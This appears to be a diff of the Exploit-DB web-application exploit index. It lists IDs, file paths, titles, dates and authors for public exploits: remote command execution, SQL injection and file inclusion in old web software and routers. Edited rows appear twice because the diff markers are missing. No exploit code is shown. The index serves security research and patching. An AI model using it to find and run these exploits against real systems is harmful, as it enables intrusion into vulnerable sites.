1491,exploits/php/webapps/1491.php,"DocMGR 0.54.2 - 'file_exists' Remote Command Execution",2006-02-11,rgod,webapps,php,
1492,exploits/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,webapps,php,
1493,exploits/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution",2006-02-13,rgod,webapps,php,
1494,exploits/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution",2006-02-13,rgod,webapps,php,
1493,exploits/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Command Execution",2006-02-13,rgod,webapps,php,
1494,exploits/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Command Execution",2006-02-13,rgod,webapps,php,
1498,exploits/php/webapps/1498.php,"webSPELL 4.01 - 'title_op' SQL Injection",2006-02-14,x128,webapps,php,
1499,exploits/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",webapps,php,
1501,exploits/php/webapps/1501.php,"PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution",2006-02-16,rgod,webapps,php,
1501,exploits/php/webapps/1501.php,"PHPKIT 1.6.1R2 - 'filecheck' Remote Command Execution",2006-02-16,rgod,webapps,php,
1503,exploits/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,webapps,php,
1508,exploits/cgi/webapps/1508.pl,"AWStats < 6.4 - 'referer' Remote Command Execution",2006-02-17,RusH,webapps,cgi,
1509,exploits/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,webapps,php,
1510,exploits/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Remote Code Execution",2006-02-17,RusH,webapps,php,
1511,exploits/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution",2006-02-17,rgod,webapps,php,
1511,exploits/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Command Execution",2006-02-17,rgod,webapps,php,
1512,exploits/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,webapps,php,
1513,exploits/php/webapps/1513.php,"BXCP 0.2.9.9 - 'tid' SQL Injection",2006-02-19,x128,webapps,php,
1514,exploits/asp/webapps/1514.pl,"MiniNuke 1.8.2b - 'pages.asp' SQL Injection",2006-02-19,nukedx,webapps,asp,
1515,exploits/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution",2006-02-20,rgod,webapps,php,
1515,exploits/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' Remote Command Execution",2006-02-20,rgod,webapps,php,
1516,exploits/php/webapps/1516.php,"ilchClan 1.05g - 'tid' SQL Injection",2006-02-20,x128,webapps,php,
1521,exploits/php/webapps/1521.php,"Noahs Classifieds 1.3 - 'lowerTemplate' Remote Code Execution",2006-02-22,trueend5,webapps,php,
1522,exploits/php/webapps/1522.php,"NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution",2006-02-23,rgod,webapps,php,
@ -16862,14 +16862,14 @@ id,file,description,date,author,type,platform,port
1546,exploits/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,webapps,php,
1547,exploits/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,webapps,php,
1548,exploits/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,webapps,php,
1549,exploits/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution",2006-03-04,rgod,webapps,php,
1549,exploits/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commans Execution",2006-03-04,rgod,webapps,php,
1550,exploits/asp/webapps/1550.txt,"TotalECommerce 1.0 - 'index.asp?id' SQL Injection",2006-03-04,nukedx,webapps,asp,
1553,exploits/php/webapps/1553.pl,"Fantastic News 2.1.2 - 'script_path' Remote Code Execution",2006-03-04,uid0,webapps,php,
1556,exploits/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - 'load' SQL Injection",2006-03-06,SkOd,webapps,php,
1561,exploits/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - 'xrms_file_root' Code Execution",2006-03-07,rgod,webapps,php,
1562,exploits/asp/webapps/1562.pl,"CilemNews System 1.1 - 'yazdir.asp' haber_id SQL Injection",2006-03-07,nukedx,webapps,asp,
1563,exploits/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)",2006-03-07,sirh0t,webapps,php,
1566,exploits/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution",2006-03-08,rgod,webapps,php,
1566,exploits/php/webapps/1566.php,"Gallery 2.0.3 - 'stepOrder[]' Remote Command Execution",2006-03-08,rgod,webapps,php,
1567,exploits/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,webapps,php,
1569,exploits/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,webapps,asp,
1570,exploits/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,webapps,php,
@ -16915,18 +16915,18 @@ id,file,description,date,author,type,platform,port
1654,exploits/php/webapps/1654.txt,"autonomous lan party 0.98.1.0 - Remote File Inclusion",2006-04-09,Codexploder,webapps,php,
1655,exploits/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,webapps,php,
1656,exploits/php/webapps/1656.txt,"Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,webapps,php,
1659,exploits/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,webapps,php,
1659,exploits/php/webapps/1659.php,"phpList 2.10.2 - 'GLOBALS[]' Remote Code Execution",2006-04-10,rgod,webapps,php,
1660,exploits/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - Help Viewer Remote Code Execution (Metasploit)",2006-04-10,Inkubus,webapps,php,
1661,exploits/php/webapps/1661.pl,"phpBB 2.0.19 - 'user_sig_bbcode_uid' Remote Code Execution",2006-04-10,RusH,webapps,php,
1662,exploits/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,webapps,php,
1663,exploits/php/webapps/1663.php,"Simplog 0.9.2 - 's' Remote Commands Execution",2006-04-11,rgod,webapps,php,
1663,exploits/php/webapps/1663.php,"Simplog 0.9.2 - 's' Remote Command Execution",2006-04-11,rgod,webapps,php,
1665,exploits/php/webapps/1665.pl,"Sphider 1.3 - 'configset.php' Remote File Inclusion",2006-04-12,rgod,webapps,php,
1666,exploits/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,webapps,php,
1668,exploits/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution",2006-04-13,ReZEN,webapps,php,
1669,exploits/cgi/webapps/1669.pl,"Censtore 7.3.x - 'censtore.cgi' Remote Command Execution",2006-04-13,FOX_MULDER,webapps,cgi,
1670,exploits/cgi/webapps/1670.pl,"quizz 1.01 - 'quizz.pl' Remote Command Execution",2006-04-13,FOX_MULDER,webapps,cgi,
1672,exploits/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,webapps,php,
1673,exploits/php/webapps/1673.php,"phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution",2006-04-14,rgod,webapps,php,
1673,exploits/php/webapps/1673.php,"phpWebSite 0.10.2 - 'hub_dir' Remote Command Execution",2006-04-14,rgod,webapps,php,
1674,exploits/php/webapps/1674.txt,"osCommerce 2.2 - 'extras' Source Code Disclosure",2006-04-14,rgod,webapps,php,
1677,exploits/cgi/webapps/1677.php,"SysInfo 1.21 - 'sysinfo.cgi' Remote Command Execution",2006-04-14,rgod,webapps,cgi,
1678,exploits/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution",2006-04-15,rgod,webapps,php,
@ -17325,7 +17325,7 @@ id,file,description,date,author,type,platform,port
2267,exploits/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",webapps,cgi,
2268,exploits/php/webapps/2268.php,"e107 < 0.75 - GLOBALS Overwrite Remote Code Execution",2006-08-28,rgod,webapps,php,
2269,exploits/php/webapps/2269.txt,"Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion",2006-08-28,SHiKaA,webapps,php,
2270,exploits/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,webapps,php,
2270,exploits/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - 'GLOBALS[]' Remote Code Execution",2006-08-29,Kacper,webapps,php,
2271,exploits/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - 'chemin' Remote File Inclusion",2006-08-29,"Mehmet Ince",webapps,php,
2272,exploits/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",webapps,php,
2273,exploits/php/webapps/2273.txt,"ExBB Italiano 0.2 - exbb[home_path] Remote File Inclusion",2006-08-29,SHiKaA,webapps,php,
@ -18011,7 +18011,7 @@ id,file,description,date,author,type,platform,port
3215,exploits/php/webapps/3215.pl,"Foro Domus 2.10 - 'phpbb_root_path' Remote File Inclusion",2007-01-28,"Mehmet Ince",webapps,php,
3216,exploits/php/webapps/3216.txt,"xNews 1.3 - 'xNews.php' SQL Injection",2007-01-28,ajann,webapps,php,
3217,exploits/php/webapps/3217.txt,"PHP Generic library & Framework - 'INCLUDE_PATH' Remote File Inclusion",2007-01-28,"Mehmet Ince",webapps,php,
3221,exploits/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution",2007-01-29,rgod,webapps,php,
3221,exploits/php/webapps/3221.php,"GuppY 4.5.16 - Remote Command Execution",2007-01-29,rgod,webapps,php,
3222,exploits/php/webapps/3222.txt,"Webfwlog 0.92 - 'debug.php' Remote File Disclosure",2007-01-29,GoLd_M,webapps,php,
3225,exploits/php/webapps/3225.pl,"Galeria Zdjec 3.0 - 'zd_numer.php' Local File Inclusion",2007-01-30,ajann,webapps,php,
3226,exploits/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,webapps,php,
@ -25325,7 +25325,7 @@ id,file,description,date,author,type,platform,port
16901,exploits/php/webapps/16901.rb,"PAJAX - Remote Command Execution (Metasploit)",2010-04-30,Metasploit,webapps,php,
16902,exploits/php/webapps/16902.rb,"CakePHP 1.3.5/1.2.8 - Cache Corruption (Metasploit)",2011-01-14,Metasploit,webapps,php,
16904,exploits/php/webapps/16904.rb,"Fonality trixbox CE 2.6.1 - 'langChoice' Local File Inclusion (Metasploit)",2011-01-08,Metasploit,webapps,php,
16905,exploits/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - configdir Remote Command Execution (Metasploit)",2009-12-26,Metasploit,webapps,cgi,
16905,exploits/cgi/webapps/16905.rb,"AWStats 6.1 < 6.2 - 'configdir' Remote Command Execution (Metasploit)",2009-12-26,Metasploit,webapps,cgi,
16906,exploits/php/webapps/16906.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)",2010-06-15,Metasploit,webapps,php,
16907,exploits/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet - Command Execution (Metasploit)",2010-07-01,Metasploit,webapps,hardware,
16908,exploits/cgi/webapps/16908.rb,"Nagios3 - 'statuswml.cgi' 'Ping' Command Execution (Metasploit)",2010-07-14,Metasploit,webapps,cgi,
@ -26674,7 +26674,7 @@ id,file,description,date,author,type,platform,port
21742,exploits/php/webapps/21742.txt,"Template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",webapps,php,
21743,exploits/php/webapps/21743.txt,"phpMyBitTorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,webapps,php,
21744,exploits/windows/webapps/21744.txt,"Novell Sentinel Log Manager 1.2.0.2 - Retention Policy",2012-10-04,"Piotr Chmylkowski",webapps,windows,
21745,exploits/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion Command Execution",2002-08-22,"Jeroen Latour",webapps,php,
21745,exploits/php/webapps/21745.txt,"Achievo 0.7/0.8/0.9 - Remote File Inclusion / Command Execution",2002-08-22,"Jeroen Latour",webapps,php,
21755,exploits/php/webapps/21755.txt,"PHPReactor 1.2.7 - Style Attribute HTML Injection",2002-08-24,"Matthew Murphy",webapps,php,
21766,exploits/asp/webapps/21766.txt,"FactoSystem Weblog 0.9/1.0/1.1 - Multiple SQL Injections",2002-08-31,"Matthew Murphy",webapps,asp,
21768,exploits/cgi/webapps/21768.txt,"Super Site Searcher - Remote Command Execution",2002-09-03,luca.ercoli,webapps,cgi,
@ -27276,7 +27276,7 @@ id,file,description,date,author,type,platform,port
23440,exploits/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,webapps,asp,
23443,exploits/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities",2003-12-16,JeiAr,webapps,php,
23445,exploits/php/webapps/23445.txt,"osCommerce 2.2 - 'osCsid' Cross-Site Scripting",2003-12-17,JeiAr,webapps,php,
23447,exploits/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",webapps,cgi,
23447,exploits/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - 'Setup.pl' Arbitrary Command Execution",2003-12-18,"Paul Craig",webapps,cgi,
23448,exploits/php/webapps/23448.php,"PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,webapps,php,
23453,exploits/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - 'index.inc.php' File Inclusion",2003-12-20,frog,webapps,php,
23454,exploits/php/webapps/23454.txt,"BES-CMS 0.4/0.5 - '/members/index.inc.php' File Inclusion",2003-12-20,frog,webapps,php,
@ -39600,3 +39600,8 @@ id,file,description,date,author,type,platform,port
44938,exploits/hardware/webapps/44938.txt,"Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,hardware,443
44939,exploits/hardware/webapps/44939.txt,"Intex Router N-150 - Arbitrary File Upload",2018-06-25,"Samrat Das",webapps,hardware,
44940,exploits/php/webapps/44940.txt,"WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80
44952,exploits/php/webapps/44952.html,"BEESCMS 4.0 - Cross-Site Request Forgery (Add Admin)",2018-06-28,bay0net,webapps,php,80
44953,exploits/php/webapps/44953.txt,"HongCMS 3.0.0 - SQL Injection",2018-06-28,Hzllaga,webapps,php,
44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,
44955,exploits/hardware/webapps/44955.txt,"DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting",2018-06-28,"Adipta Basu",webapps,hardware,80
44956,exploits/hardware/webapps/44956.py,"Cisco Adaptive Security Appliance - Path Traversal",2018-06-28,"Yassine Aboukir",webapps,hardware,

Can't render this file because it is too large.